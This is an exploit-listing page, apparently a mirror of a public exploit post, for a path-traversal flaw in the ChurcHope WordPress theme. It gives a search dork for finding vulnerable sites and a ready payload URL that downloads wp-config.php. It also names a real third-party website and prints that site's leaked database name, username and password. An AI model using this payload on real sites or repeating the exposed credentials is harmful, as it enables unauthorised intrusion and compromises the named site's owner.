Advertisement






WordPress 4.7.13 ChurcHope Responsive Themes 4.7.x Database Configuration File Download

CVE Category Price Severity
N/A CWE-16 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2019-03-21
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019030179

Below is a copy:

WordPress 4.7.13 ChurcHope Responsive Themes 4.7.x Database Configuration File Download
############################################################################################

# Exploit Title : WordPress 4.7.13 ChurcHope Responsive Themes 4.7.x Database Configuration File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/03/2019
# Vendor Homepage : themeforest.net
# Software Information Link : themeforest.net/item/churchope-responsive-wordpress-theme/2708562
# Software Affected Versions : WordPress 4.x - 4.7.13 - Software 4.7.x
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:/wp-content/themes/churchope/
# Vulnerability Type : 
CWE-16 [ Configuration ]
CWE-200 [ Information Exposure ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

############################################################################################

# Impact :
***********
* WordPress 4.x ChurcHope Responsive Themes 4.7.x is prone to a vulnerability that lets attackers download database config file because 

the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files 

within the context of the web server process and obtain potentially sensitive informations. 

* An information exposure is the intentional or unintentional disclosure  of information to an actor that is not explicitly authorized 

to have access to that information. * The software has Relative Path Traversal vulnerability and it uses external input to construct 

a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve 

to a location that is outside of that directory.

############################################################################################

# Vulnerable File :
****************
/downloadlink.php

# Vulnerable Parameter :
**********************
?file=

# Database Configuration File Download Exploit :
********************************************
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php

Informations About MySQL Database Configuration File =>
****************************************************
** The name of the database for WordPress */
define('DB_NAME', '');

/** MySQL database username */
define('DB_USER', '');

/** MySQL database password */
define('DB_PASSWORD', '');

/** MySQL hostname */
define('DB_HOST', '');

############################################################################################

# Example Vulnerable Sites :
*************************
[+] alexanderfaranpojo.com/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php

** The name of the database for WordPress 
*/
define('DB_NAME', 'alexand3_wpAFM');

/
** MySQL database username 
*/
define('DB_USER', 'alexand3_wpAFM');

/
** MySQL database password 
*/
define('DB_PASSWORD', 'c8Se4dP7fr');

/
** MySQL hostname 
*/
define('DB_HOST', 'localhost');

/
** Database Charset to use in creating database tables. 
*/
define('DB_CHARSET', 'utf8');

/** 

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

############################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.